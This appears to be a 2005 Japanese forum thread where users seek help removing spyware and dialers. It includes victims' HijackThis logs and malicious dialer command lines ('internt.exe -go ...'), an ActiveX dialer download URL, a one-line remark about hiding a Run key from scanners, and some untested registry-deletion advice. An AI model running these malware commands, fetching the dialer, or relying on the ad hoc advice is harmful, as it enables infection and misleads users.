この不具合を悪用して「Run」キーにスパイウェアが長い名前のキーを登録すると、
hijackthisですら検出不可能となる。(startuplistもか?)
(>Д<)禁断のテンプレ復活だー

700 :ひよこ名無しさん:2005/08/29(月) 19:20:13 ID:CEqWWRT5
MMB2_Clientってエラーメッセージがちょくちょく出てくる。
なんなんだこれはー

701 :ひよこ名無しさん:2005/08/29(月) 19:36:59 ID:???
       ガーーーーーン!!!そ、そんなー・・・
             l!||■■■■■■■\
            /  ■■■■■■■::::l|!l
          /    ■■■■■■■ `::::::\
         /     ■■■■■■■  `::::::\
       /    __ ■■■■■■■ _ `:::::::\
      !l||   /   ヽ  l|||!||l!!||l!!|l /   ヽ `::::::::\
     /    |;;;; ◎ ;;;;|  !!l||!|ll!l||!|l |;;;; ◎ ;;;;|!l|l|!::::::::\
   /     ⊂⊃  .ノ   l|l!' |! `|!ヽ _ ノl||!!|::::::::::::::||l!
  !l|           ̄ .|!エエエエエエ! ||l|!!!l||!!!||l!!!!|||:::::::::::::\
  /´             |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;| !!|||l|l!|l!|||l|!||l `:::::::::::::::|
  |               .|;;;;;;;;;;;;;;;;;;;;;;;;;;;;;|  !llll||l!|l!!|!|l  `::::::::::::|!
 !l||              |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;|  `l!|l l!     .:::::::::::!|
  |               .|;;;;;;/⌒ ⌒ヽ;;;;|          .:::::::::::::::|
  |              i  |;;;;;| ''' .| ''' .|;;;;| i       ...::::::::::::::|!!l
  \          |  |;;;;;;|   !  |;;;;| |      ..:::::::::::::::/
   ヽ         | .|;;;;;;|     |;;;| |    ...::::::::::::::::<
   , !||         | |!エエエエエエ!| | ......::::::::::::::::::::::::: !、|!
 /||!          ヽ ______ /    `::::::::::::::::::::::::|l|! 、

702 :ひよこ名無しさん:2005/08/29(月) 19:48:47 ID:An7q+fm0
Ad-AwareもSpybotも実行出来ないんですが、win95だからでしょうか?
会社のパソコンのダイヤルアップが国際電話に切り替わっていて、とても怖いんですが・・・

703 :ひよこ名無しさん:2005/08/29(月) 20:06:05 ID:???
>>702
すぐにリカバリしないと電話代大変だよ〜

704 :ひよこ名無しさん:2005/08/29(月) 20:17:45 ID:???
Win95でもSpybotは動くはずだが。
とりあえず、怖がるより回線引っこ抜くのが先じゃねーか?

705 :ひよこ名無しさん:2005/08/29(月) 20:30:34 ID:???
ノ∀`) アチャー
本当にお金が取られるヒト初めて見た


706 :ひよこ名無しさん:2005/08/29(月) 22:58:08 ID:???
コラ!このスレ開いたらノートンが反応したぞ!罠か〜!!!!!

707 :ひよこ名無しさん:2005/08/29(月) 23:25:12 ID:???
>675
おまい悪い香具師 GJ

>679
120%胴衣
>668に短時間での復旧は無理だろう

>706
おまい2度と来ない方が良い

708 :ひよこ名無しさん:2005/08/30(火) 00:18:25 ID:c9syknhY
c:\_RESTORE\TEMP\A0004494.CPY は Dialer.DialPlatform に感染しています。
これ感染した。けど定額なんだけど何か支障ある?
勝手にどっか高いところに電話するんでしょ?

709 :708:2005/08/30(火) 02:51:14 ID:m3Ck100F
キャッシュとTEMP消したら余裕でした。
失礼いたしました。

710 :702:2005/08/30(火) 14:04:47 ID:4z7SloeQ
昨日の状況を詳しく書きます。
IEを終了させると、いつのまにかデスクトップにエロいアイコンのショートカットが3つ作成されてました。
途中、何かをダウンロードしたりインストールしたりしていないので閲覧中に出来たんだと思います。

そこでまず回線切ってショートカット先をみると、windowsの中のinternt.exeというものを実行しようとしてるんです。
すぐ消去してしまったので、正確にあっているかわかりませんが、
C:\WINDOWS\internt.exe -go -c29 -w91
C:\WINDOWS\internt.exe -go -c29 -w91 -cat99
C:\WINDOWS\internt.exe -go -c29 -w91
このような感じだったと思います。

その後、再度インターネットに接続しようとしたのですが、ダイヤル先が010−xxxx−xxxx(覚えてませんでした)になってたり
認証IDが書き換えられていたので接続しませんでした。
正しいのか分かりませんが、とりあえずその「internt.exe」と、スパイウェアらしい「usbn」、「CneMin」というものを削除しました。
その後、書き換えられる事は無いのでとりあえずそのまま使っています。

今日、NTT、日本テレコム、KDDIに確認したところ、昨日の通信記録で国際電話は発生していないとの事なので安心かなと
思うのですが、何か対策はあるでしょうか?

ad-awareもspybotも使えないのですが、ウィルスバスターのオンラインスキャンとpanda activeScanでは以上はありませんでした。

幼稚な文章になってしまい、申し訳ないですが、宜しくお願いします。

711 :ひよこ名無しさん:2005/08/30(火) 14:08:29 ID:???
なぜ光、ADSL、専用回線をつかわないのか?

712 :ひよこ名無しさん:2005/08/30(火) 14:37:47 ID:???
>>710
>>15のダイヤルアップチェッカーを使ったら?
win95でもインスコできるみたい。

713 :702:2005/08/30(火) 14:51:09 ID:4z7SloeQ
>>711
すみません、そこは目をつむって下さい

>>712
そうですね。今回で懲りました。さっそく導入します。

はぁ、自宅のパソコンならこんなに悩まないんだけど。。

714 : ◆N9P3SuvBPo :2005/08/30(火) 18:37:26 ID:???
>554の実験報告が無いな…
じゃあ、554で言う2つのレジストリキーを削除したらどうなるか。
実際にはやっていないのだが、554で削除指示されているキーをエクスポートし、メモ帳で開いてみた。
長くなるので途中省略するが、以下のようなエントリーが出てきた。

[HKEY_CLASSES_ROOT\PROTOCOLS]

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler]

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\http]
@="http: Asychronous Pluggable Protocol Handler"
"CLSID"="{79eac9e2-baf9-11ce-8c82-00aa004ba90b}"

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\http\0x00000001]
@="Microsoft OLE DB Moniker Binder for Internet Publishing"
"CLSID"="{E1D2BF42-A96B-11d1-9C6B-0000F875AC61}"

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\http\oledb]
@="Microsoft OLE DB Provider for Internet Publishing"
"CLSID"="{E1D2BF40-A96B-11D1-9C6B-0000F875AC61}"

"PROTOCOLS"を削除しても起動不可になる可能性は低いと思われるが、
ネットなどに繋げなくなるの症状がでるのでは?と推測する。
どちらにしても実験台になってくれた人の報告が無いと、何とも言えん。

715 :ひよこ名無しさん:2005/08/30(火) 18:42:15 ID:???
仮想マシンでやれや

716 : ◆N9P3SuvBPo :2005/08/30(火) 18:45:06 ID:???
>715
実験台になってくれませんか。
もちろん、絶対にバックアップを取ってから。

717 :ひよこ名無しさん:2005/08/30(火) 19:13:59 ID:???
>>716
一人でやってろやカス野郎ww

718 : ◆N9P3SuvBPo :2005/08/30(火) 19:15:58 ID:???
今やってみました。
これからどうなる。

719 :ひよこ名無しさん:2005/08/30(火) 20:09:22 ID:???
(´・ω・`) 知らんがな

720 :ひよこ名無しさん:2005/08/31(水) 04:51:48 ID:pjLWZ0J1
1〜10全部実行してみました。

やっぱり起動後2〜3時間するとエロサイトが立ち上がります。
http://www.movie-revolution.com/6/index2.php
ログを貼っておしえてもらおうとおもうんですがプロパティが
ありません。こんなときはどうすればいいのでしょうか?
OSはXPです。

721 :ひよこ名無しさん:2005/08/31(水) 04:59:38 ID:tNdnYEow
http://mixi.jp/view_community.pl?id=229603

722 :ひよこ名無しさん:2005/08/31(水) 07:00:30 ID:???
>>720
PC持って逃げろ。

723 :ひよこ名無しさん:2005/08/31(水) 10:15:05 ID:rZOnqoa2
>>720
とりあえずIEはもう使うなIEコンポも

Operaが10周年を記念してライセンスキーを無料配布
ttp://www.forest.impress.co.jp/article/2005/08/30/opera10anniversary.html
通常\5040が無料、祭りが終わり次第終了。
日本語バージョン8にも対応してます。

http://pc8.2ch.net/test/read.cgi/pcnews/1125437051/

724 :ひよこ名無しさん:2005/08/31(水) 10:34:48 ID:???
>>723
うわぁ!!!!!!!!
まじThx。うれしくてしかたねぇ〜
広告がきえたあああああああああ

725 :ひよこ名無しさん:2005/08/31(水) 10:37:08 ID:???
>>723
うはっ!ライセンスキー100億万個ゲッツしたwww

726 :ひよこ名無しさん:2005/08/31(水) 15:53:38 ID:???
>>725
1個くれww

727 :ひよこ名無しさん:2005/08/31(水) 16:07:33 ID:???
>>726
まだやってるんじゃね?
窓の杜 - 【NEWS】Operaが10周年を記念してライセンスキーを無料配布、本日22時開始
http://www.forest.impress.co.jp/article/2005/08/30/opera10anniversary.html

728 :ひよこ名無しさん:2005/08/31(水) 17:24:40 ID:???
Opera最高〜

729 :ひよこ名無しさん:2005/08/31(水) 17:26:55 ID:33UNNrze
動ナビでいつもエロサンプルダウンロードしていたんですが、
数日前から左クリックすると、ファイルを開く・保存などの
画面が出ず、いきなりダウンロードして、しかも100%に
なってもファイル・またはディレクトリが見つかりませんと
エラーになります。だれか助けて


730 :ひよこ名無しさん:2005/08/31(水) 17:31:47 ID:Xc8ghju1
IEを開くときに外国サイトが
最初にでてくるんですけど
これってやばいんですか?
どのような被害があるんですか?
教えてください。お願いします。

731 :ひよこ名無しさん:2005/08/31(水) 17:32:39 ID:???


229 名前:ひよこ名無しさん[] 投稿日:2005/08/31(水) 17:14:34 ID:33UNNrze
動ナビでいつもエロサンプルダウンロードしていたんですが、
数日前から左クリックすると、ファイルを開く・保存などの
画面が出ず、いきなりダウンロードして、しかも100%に
なってもファイル・またはディレクトリが見つかりませんと
エラーになります。だれか助けて

732 :ひよこ名無しさん:2005/08/31(水) 17:33:20 ID:???
>>730
テンプレやれ、大変危険な状態だ。

733 :ひよこ名無しさん:2005/08/31(水) 17:33:38 ID:???
>>730
好きなんだろ エロ?

734 :ひよこ名無しさん:2005/08/31(水) 17:39:06 ID:???
>>730
総質から来たな。
だから、まずテンプレを試してあkら質問。
そうしないとここでは報知新聞になる。

735 :ひよこ名無しさん:2005/08/31(水) 17:44:03 ID:???
奥さん 集金で〜〜す

736 :ひよこ名無しさん:2005/08/31(水) 17:45:58 ID:???
>>735
放置新聞の集金早すぎるぞ

737 :ひよこ名無しさん:2005/08/31(水) 17:51:57 ID:???
体で払うって・・・ ぅぅ ぁおくさ〜〜〜ん

738 :ひよこ名無しさん:2005/08/31(水) 18:18:04 ID:0n24Z+3u
トロイをブロックしたけど
検索したらトロイがいました

リカバリした方が良いですか?

739 :ひよこ名無しさん:2005/08/31(水) 18:21:25 ID:???
>>738
すぐに実行しなさい。

740 : ◆N9P3SuvBPo :2005/08/31(水) 18:45:36 ID:???
>738
トロイやボットの場合はリカバリーしたほうが早く片が付く。
以下はとりあえず実験だけど、テンプレ>6の「システムの復元」の応用編って言う奴?

WindowsXP専用
セーフモードで起動(PC起動→F8連打→セーフモードを選択)する
スタートアップフォルダを確認(怪しいものがあればゴミ箱へ移動)する
セーフモードとコマンドプロンプトで起動(PC再起動→F8連打→セーフモードとコマンドプロンプトを選択)する
explorer.exeの変わりにcmd.exeが立ち上がりコマンドプロンプト画面が起動するので
そこから「システムの復元」を実行してみる

c:\>%systemroot%\system32\restore\rstrui.exe と入力してEnter
失敗した場合は次のようにコマンドを入力してみる
c:\>cd*windows と入力してEnter
c:\windows>cd*system32 と入力してEnter
c:\windows\system32>cd*restore と入力してEnter
c:\windows\system32\restore>rstrui.exe と入力してEnter
(補足:コマンド入力の"*"は半角スペースです)
システムの復元ツールが立ち上がったら問題発生直前の日付を選んで復元してみる

741 :ひよこ名無しさん:2005/08/31(水) 19:08:49 ID:???
工エエェェ(´д`)ェェエエ工

742 :ひよこ名無しさん:2005/09/01(木) 00:10:07 ID:???
このスレにはアミバ様がいますね

743 :ひよこ名無しさん:2005/09/01(木) 05:53:53 ID:rxfWDeAB
★使用OS(Windows XP HomeEdition SP2)
★使用ソフトウェア名と(Internet Explorer 6)
★関係有りそうな出来事 ワンクリ踏み、
ーセキュリティソフト入れる前にラブレターM@M?て言うウイルス
を進入させてしまいました
★起こった出来事 ネット中にフリーズ、その後からネットに繋がらなくなり
、しまいには画面にプログラマーの方が使いそうな英語ばかり表示
★現在の状況 OEオフィスのアップデートでエラーになると妻に怒られてます
★PCのメーカ名はNECのLaVieL LL750/2とあります
●OEのアップデートとウィンドウズの自動更新です、
宜しくお願いいたします、次にHijack Thisのログ貼ります


744 :ひよこ名無しさん:2005/09/01(木) 05:56:04 ID:rxfWDeAB
Logfile of HijackThis v1.98.2
Scan saved at 5:34:11, on 2005/09/01
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Norton Internet Security\ISSVC.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\Atiptaxx.exe
C:\Program Files\Apoint2K\Apoint.exe
C:\Program Files\necmfk\necmfk.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Canon\MyPrinter\BJMyPrt.exe

745 :ひよこ名無しさん:2005/09/01(木) 05:57:22 ID:rxfWDeAB
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\System32\ati2evxx.exe
C:\Program Files\Microsoft Reference\Microsoft Bookshelf 3.0\qshelf.exe
C:\Program Files\NETSW\NETICON.EXE
C:\WINDOWS\HIBERGID.exe
C:\Program Files\Apoint2K\Apntex.exe
C:\WINDOWS\system32\conime.exe
C:\Program Files\Common Files\Symantec Shared\DJSNETCN.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\NTMETER.exe
C:\Smdata\ReadSctService.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Yahoo!J\Messenger\ymsgr_tray.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Symantec Shared\AdBlocking\NSMdtr.exe
C:\WINDOWS\System32\msiexec.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\ok\デスクトップ\Hijack This\HijackThis.exe

746 :ひよこ名無しさん:2005/09/01(木) 06:00:17 ID:rxfWDeAB
O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\COMPAN~1\YCOMP5~1.DLL
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O2 - BHO: Norton Internet Security - {9ECB9560-04F9-4bbc-943D-298DDF1699E1} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Yahoo!ツールバー - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\ycomp5_3_15_0.dll
O3 - Toolbar: Easy-WebPrint - {327C2873-E90D-4c37-AA9D-10AC9BABA46C} - C:\Program Files\Canon\Easy-WebPrint\Toolband.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Norton Internet Security - {0B53EAC3-8D69-4b9e-9B19-A37C9A5676A7} - C:\Program Files\Common Files\Symantec Shared\AdBlocking\NISShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton Internet Security\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [AtiPTA] Atiptaxx.exe

747 :ひよこ名無しさん:2005/09/01(木) 06:02:00 ID:???
>>746
兵器ジャマイカ

748 :ひよこ名無しさん:2005/09/01(木) 06:02:33 ID:rxfWDeAB
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [NECMFK] C:\Program Files\necmfk\necmfk.exe
O4 - HKLM\..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
O4 - HKLM\..\Run: [imjpmig] C:\Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
O4 - HKLM\..\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Easy-PrintToolBox] C:\Program Files\Canon\Easy-PrintToolBox\BJPSMAIN.EXE /logon
O4 - HKLM\..\Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\WINDOWS\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [URLLSTCK.exe] C:\Program Files\Norton Internet Security\UrlLstCk.exe
O4 - HKLM\..\RunServices: [DJSNetCN] C:\Program Files\Common Files\Symantec Shared\DJSNETCN.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background


749 :ひよこ名無しさん:2005/09/01(木) 06:03:29 ID:rxfWDeAB
O4 - HKCU\..\Run: [Yahoo!Japan Pager] "C:\Program Files\Yahoo!J\Messenger\ypagerj.exe" -quiet
O8 - Extra context menu item: Google 検索(&G) - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203
O8 - Extra context menu item: Microsoft Excel にエクスポート(&X) - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: このページのキャッシュ - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: リンク元 - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: 翻訳(&T) - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: 関連ページ - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra 'Tools' menuitem: Yahoo!メッセンジャー - {CEBF73C0-BA2E-11d4-A73A-00508B33FB82} - C:\PROGRA~1\Yahoo!J\MESSEN~1\YPagerj.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O11 - Options group: [!CNS] JWord (日本語キーワード)

750 :ひよこ名無しさん:2005/09/01(木) 06:04:16 ID:rxfWDeAB
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {226906C8-B910-11D3-82A3-0000F81A655B} (Mbayactx Control) - http://121ware.com/msgbay/mbayactx.cab
O16 - DPF: {2931566C-B8A6-46C5-BF4D-E6AB9251E953} (Nexon Package Manager Control) - http://www.nexon.co.jp/JP/f/ActiveX/Public/nxpm.cab
O16 - DPF: {29C13B62-B9F7-4CD3-8CEF-0A58A1A99441} - http://fdl.msn.com/public/chat/msnchat41.cab
O16 - DPF: {41F17733-B041-4099-A042-B518BB6A408C} - http://a1540.g.akamai.net/7/1540/52/20021126/qtinstall.info.apple.com/dribnif/jp/win/QuickTimeInstaller.exe
O16 - DPF: {4A88CB42-BBFE-496A-884F-98E8AC316292} (YJInstStarter Control) - http://dl.msg.yahoo.co.jp/pgdownload/yjinst.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupdate.microsoft.com/v5consumer/V5Controls/en/x86/client/wuweb_site.cab?1094571857915
O16 - DPF: {6635C8A2-9ABB-4DC8-B928-B1E4447B31D5} (SecuEnvSignalar Class) - https://bbsecu.jp/BBSecuEnvSignalar.CAB
O16 - DPF: {69A4F9FF-E915-11D5-A9F1-009099104002} (XDialer Class) - http://ura-xxx.com/XDialer2.CAB
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1125275375370
O16 - DPF: {7A32634B-029C-4836-A023-528983982A49} (MSN Chat Control 4.2) - http://fdl.msn.com/public/chat/msnchat42.cab
O16 - DPF: {B020B534-4AA2-4B99-BD6D-5F6EE286DF5C} (Symantec Download Bridge) - https://bbsecu.jp/SymDlBrg.cab
O16 - DPF: {EF99BD32-C1FB-11D2-892F-0090271D4F88} (&Yahoo!ツールバー) - http://dl.companion.yahoo.co.jp/dl/toolbar/yiebio4.cab
O16 - DPF: {FB8D70E2-554A-4C75-90BE-66C302367E0D} (XHeart.XHeartCtl) - http://www.eromax.com/cab/XHeart.CAB



751 :750までの者です:2005/09/01(木) 06:13:56 ID:rxfWDeAB
長くなってすみません。
自動更新を行うと
現在使用出来ない所に…みたいに言われます、
CDを入れても良いらしいのですが妻が残してるはずが
ありません
スレ違いかもですが総合質問板で誘導されたので


752 :ひよこ名無しさん:2005/09/01(木) 06:17:47 ID:???
Jword入ってまんがな

753 :ひよこ名無しさん:2005/09/01(木) 06:27:02 ID:???
>CDを入れても良いらしいのですが妻が残してるはずが ありません

意味が解らん。

諦めて、クリーンインスコしなされ。

754 :ひよこ名無しさん:2005/09/01(木) 06:30:36 ID:???
→CDを入れてリカバリすると直るらしいのですが、妻が捨ててしまいました。

755 :ひよこ名無しさん:2005/09/01(木) 06:31:30 ID:???
>>751
JWordは有名なスパイウエアの巣窟
対策はこのスレのテンプレ読んで下さい

756 :ひよこ名無しさん:2005/09/01(木) 06:32:26 ID:???
>>754
妻が捨てる、というのは新しいパターンだなw

757 :ひよこ名無しさん:2005/09/01(木) 06:38:09 ID:???
>>756
妻に捨てられる、というのは昔からあるパターン

758 :ひよこ名無しさん:2005/09/01(木) 06:39:24 ID:???
>>757
可哀想に・・・・・゚・( ノД`)・゚・
捨てられたのね

759 :ひよこ名無しさん:2005/09/01(木) 06:41:05 ID:???
>>757
妻がリカバリCDを持って実家に帰りました、
っていうのは新しいパターンか?

760 :ひよこ名無しさん:2005/09/01(木) 06:45:42 ID:???
人生もリカバリできればいいのに

761 :ひよこ名無しさん:2005/09/01(木) 06:46:43 ID:???
それ、おれもしたい。

762 :ひよこ名無しさん:2005/09/01(木) 06:48:18 ID:???
魔界転生

763 :ひよこ名無しさん:2005/09/01(木) 06:53:13 ID:???
p://ura-xxx.com/XDialer2.CAB

これ、エロのダイアラーだよな?

NECにお願いして、リカバリーCD送ってもらうか、
新品のWinXP買って、クリーンインスコしたほうがいいな。

764 :ひよこ名無しさん:2005/09/01(木) 06:54:39 ID:???
>>763
さすが よく見つけた

765 :ひよこ名無しさん:2005/09/01(木) 06:57:13 ID:???
とりあえずJword系の3つとそれはやばそうだな。
あとこれは何?
ttp://www.eromax.com/cab/XHeart.CAB

766 :ひよこ名無しさん:2005/09/01(木) 07:09:28 ID:???
ディレクトリーサーチみたいだな

767 :750:2005/09/01(木) 07:09:30 ID:rxfWDeAB
現段階はアップデート以外は正常?に機能してるみたいですが
緊急に対策しないと生活に支障があることはどれでしょう?
私に家のPCの管理権限がない(ゲストさん)ために作業は
夜からになるのですが…

768 :ひよこ名無しさん:2005/09/01(木) 08:28:02 ID:???
>>765
エロサイトのキャッシュ

769 :ひよこ名無しさん:2005/09/01(木) 08:29:11 ID:???
あらあら。

770 :750:2005/09/01(木) 09:51:36 ID:rxfWDeAB
何度もすみません、ダイアラてことは
とんでもない電話料金が請求されるんでしょうか?


771 :ひよこ名無しさん:2005/09/01(木) 09:54:47 ID:???
>>770
鴨知れません

772 :ひよこ名無しさん:2005/09/01(木) 10:08:03 ID:???
>>750
これだけかな・・・

O2 - BHO: IDN Helper Object - {118CE65F-5D86-4AEA-A9BD-94F92B89119F} - C:\WINDOWS\DOWNLO~1\CNSMIN~1.DLL
O8 - Extra context menu item: JWordでウェブ検索(&J) - res://C:\WINDOWS\DOWNLO~1\CnsMin.dll/203
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing
O16 - DPF: {6635C8A2-9ABB-4DC8-B928-B1E4447B31D5} (SecuEnvSignalar Class) - https://bbsecu.jp/BBSecuEnvSignalar.CAB
O16 - DPF: {69A4F9FF-E915-11D5-A9F1-009099104002} (XDialer Class) - http://ura-xxx.com/XDialer2.CAB
O16 - DPF: {FB8D70E2-554A-4C75-90BE-66C302367E0D} (XHeart.XHeartCtl) - http://www.eromax.com/cab/XHeart.CAB

>>770
接続形態による

773 :750:2005/09/01(木) 10:21:59 ID:rxfWDeAB
…早急にNECに電話してリカバリーCD送ってもらいます、
皆さん何度も丁寧にありがとうございました!

774 :ひよこ名無しさん:2005/09/01(木) 10:29:20 ID:???
最近NECノートって、リカバリCD自分で作るんじゃなかったっけ?
友達んちのPC設定に行った時、説明書にそんなこと書いてあったようななかったような・・・

775 :ひよこ名無しさん:2005/09/01(木) 10:59:14 ID:???
パソコンはこれ?NECで調べたらわからなかった。
http://121ware.com/community/navigate/support/product/svrt/controller?BV_SessionID=NNNN0562766587.1125538854NNNN&BV_EngineID=cccgaddfihfemiecflgcefkdgfgdffm.0&ND=2685&prevno=1&action=prodInfo&prod_id=PC-LL7502D&bId=Main%20Features
仮にこれだとして添付品にリカバリCDってついてないんだけど(普通はリカバリCDあったら書くような気がするんだが)

776 :ひよこ名無しさん:2005/09/01(木) 11:11:16 ID:O9Su4UuI
ttp://balabolka.biz/start.html
がスタートページがなります。
何度変えても無理です。
ど〜したらよいですか?

777 :ひよこ名無しさん:2005/09/01(木) 11:12:52 ID:???
>>776
>>1から順にやってください

778 :776:2005/09/01(木) 11:15:05 ID:O9Su4UuI
はい・・

779 :ひよこ名無しさん:2005/09/01(木) 11:16:33 ID:???
>>774
たぶんHDDリカバリになっていて、
必要ならCDを自分で作ると思った

780 :750:2005/09/01(木) 11:31:10 ID:rxfWDeAB
>>775
それです
>>772
ヤフーBBの無線LAN、つなぎ放題てヤツです

インターネットオプションのトコには
DIONコミコミアナログ/ISDN

とあります。妻にはヤフーに「変なトコへ電話してないか?」
の確認の電話をするように言いましたが
「難しい事言わないで」・・鬱ですorz

781 :ひよこ名無しさん:2005/09/01(木) 12:47:03 ID:???
>>780
とりあえずネットから切り離すよう電話して、帰ってからリカバリしろよ
それでいいじゃん

782 :ひよこ名無しさん:2005/09/01(木) 14:19:13 ID:zqNT8UOP
ネット繋いでると、勝手に国際電話に接続先が書き換わってしまいます。どうすればいいでしょうか
デスクトップに勝手に出現したアイコンのプロパティを調べてググった結果、
多分C:\WINDOWS\internt.exe -go -c200 -w4 が原因だと思うんですが、
最新のウィルスソフト(etrust2005)入れてるのに発見できませんでした・・・

783 :ひよこ名無しさん:2005/09/01(木) 14:20:36 ID:???
>>782
ふぅ〜
何でマルチするかな?

784 :ひよこ名無しさん:2005/09/01(木) 14:21:44 ID:???
ごめんなさい・・・

違うウィルスソフト買ってみます・・・すみませんでした

785 :ひよこ名無しさん:2005/09/01(木) 14:27:09 ID:???
>782
取りあえず、ここの被害対策をやってみれ、
http://www.higaitaisaku.com/kudaranfaq.html#01

